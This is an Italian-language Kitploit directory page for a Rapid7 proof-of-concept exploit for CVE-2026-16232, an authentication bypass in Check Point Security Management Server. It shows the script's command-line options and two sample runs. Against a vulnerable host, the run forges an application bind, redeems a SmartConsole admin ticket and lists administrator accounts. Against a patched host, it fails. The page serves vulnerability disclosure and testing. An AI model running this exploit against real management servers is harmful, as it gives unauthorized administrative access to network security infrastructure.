Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-16232 — Uno script proof-of-concept per sfruttare CVE-2026-16232, un bypass dell'autenticazione tramite il processo di login di SmartConsole utilizzando un token applicativo. | Kitploit
Strumenti/GitHubGitHub/sfewer-r7/cve-2026-16232
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitPenetration Testing
GitHubsfewer-r7/cve-2026-16232

CVE-2026-16232

Uno script proof-of-concept per sfruttare CVE-2026-16232, un bypass dell'autenticazione tramite il processo di login di SmartConsole utilizzando un token applicativo.

Vedi Repository
11723 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-16232

Panoramica

Uno script proof-of-concept per sfruttare CVE-2026-16232, un bypass dell'autenticazione ottenuto tramite il processo di login di SmartConsole utilizzando un token applicativo. Questa vulnerabilità interessa Check Point Security Management Server e Multi-Domain Security Management Server (MDS).

Per un'analisi tecnica completa, consulta la nostra Analisi di Rapid7.

Utilizzo

root@kitploit:~
$ python3 CVE-2026-16232.py --help
usage: CVE-2026-16232.py [-h] --target TARGET [--fwm-port FWM_PORT] [--cpm-port CPM_PORT] [--timeout TIMEOUT]

Demonstrate CVE-2026-16232 by forging an application bind and redeeming a SmartConsole admin ticket.

options:
  -h, --help           show this help message and exit
  --target TARGET      management server hostname or IP
  --fwm-port FWM_PORT  SIC/CPMI port (default: 18190)
  --cpm-port CPM_PORT  CPM SOAP port (default: 19009)
  --timeout TIMEOUT    network timeout in seconds (default: 10)

Esempi

Eseguendo il PoC contro un target vulnerabile, si mostra che il bypass dell'autenticazione funziona.

root@kitploit:~
$ python3 CVE-2026-16232.py --target 192.168.86.15
===============================================================================================
Rapid7 Labs - Check Point authentication bypass via SmartConsole login process (CVE-2026-16232)
===============================================================================================
[+] Targeting: 192.168.86.15
[+] SIC/CPMI connected
[+] Forged application DN: cn=cp_mgmt,o=gw-5622ca..5otbwa
[+] Application bind succeeded
[+] Application token obtained: XYB8PbLoXXnMx4J7W43UK-BhrjWkolvihp0P98G2qDc
[+] getServerInfo
    hostName: gw-5622ca
    hostIpAddress: 192.168.86.15
    osName: Linux
    osVersion: 3.10.0-1160.15.2cpx86_64
[+] Application token GetAllAdmins count: 0
[+] SmartConsole application-token ticket redeemed: 31bd621cc8855634fd97484fec258a18eb14eb8feb14b22c260a4accba715808
[+] GetAllAdmins count: 6
    admin: UNIX_PASSWORD
    Remote CPM Server_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD
    upgrade_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD
    admin_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD
    SmartView Reporter Client_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD
    CPM Server_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD

Eseguendo il PoC contro un target patchato, si mostra che la richiesta di bind applicativo malevola fallisce.

root@kitploit:~
$ python3 CVE-2026-16232.py --target 192.168.86.16
===============================================================================================
Rapid7 Labs - Check Point authentication bypass via SmartConsole login process (CVE-2026-16232)
===============================================================================================
[+] Targeting: 192.168.86.16
[+] SIC/CPMI connected
[+] Forged application DN: cn=cp_mgmt,o=gw-5622cc..tmbpin
[-] Application bind failed. The target is likely patched and not vulnerable.
Scarica lo strumento